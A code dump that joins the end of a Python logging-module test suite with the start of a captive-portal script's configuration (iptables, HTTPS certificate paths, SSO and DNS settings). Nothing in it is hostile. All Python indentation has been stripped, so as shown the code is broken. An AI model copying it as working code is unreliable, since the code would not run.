class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
captive_portal.py
|
#!/usr/bin/python3
import http.server
import subprocess
import cgi
import os
import sys
import datetime
import binascii
import re
import threading
import ssl
import urllib
import json
import html
import socket
import time
import sqlite3
import hashlib
''' Configuration
-----------------------------------'''
# Server Information
LOCAL_SERVER_IP = "192.168.20.1"
HTTP_SERVER_PORT = 80
HTTPS_SERVER_PORT = 443
REMOTE_SERVER_DOMAIN = "captive.ddns.net"
try:
REMOTE_SERVER_IP = socket.gethostbyname(REMOTE_SERVER_DOMAIN)
except socket.gaierror:
REMOTE_SERVER_IP = LOCAL_SERVER_IP
# Interfaces
INTERFACE_INPUT = "wlan0"
INTERFACE_OUTPUT = "eth0"
# Files
PAGES_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pages')
# iptables
IPTABLES_RESET = True
IPTABLES_FORWARD = True
IPTABLES_INIT = True
# HTTPS
SSL_CERT_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'cert.pem')
SSL_KEY_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'key.pem')
# Custom certificate
# openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
# SSO (Configuration has to be inside the sso_config.py file)
SSO_FACEBOOK = True
SSO_FACEBOOK_APP_ID = None
SSO_FACEBOOK_APP_SECRET = None
SSO_GOOGLE = True
SSO_GOOGLE_CLIENT_ID = None
SSO_GOOGLE_CLIENT_SECRET = None
from sso_config import *
# Local DNS Server
USE_CUSTOM_DNS_SERVER = True
LOCAL_DNS_SERVER_IP = LOCAL_SERVER_IP
DNS_SERVER_PORT = 53
# Exclude Facebook addresses
SSO_FACEBOOK_EXCLUDE_DOMAINS = [
"facebook.com",
"www.facebook.com",
"static.xx.fbcdn.net"
]
SSO_GOOGLE_EXCLUDE_DOMAINS = [
#"accounts.google.com",
#"accounts.google.gr",
"lh3.googleusercontent.com",
"fonts.gstatic.com",
"ssl.gstatic.com",
"accounts.youtube.com",
"play.google.com"
]
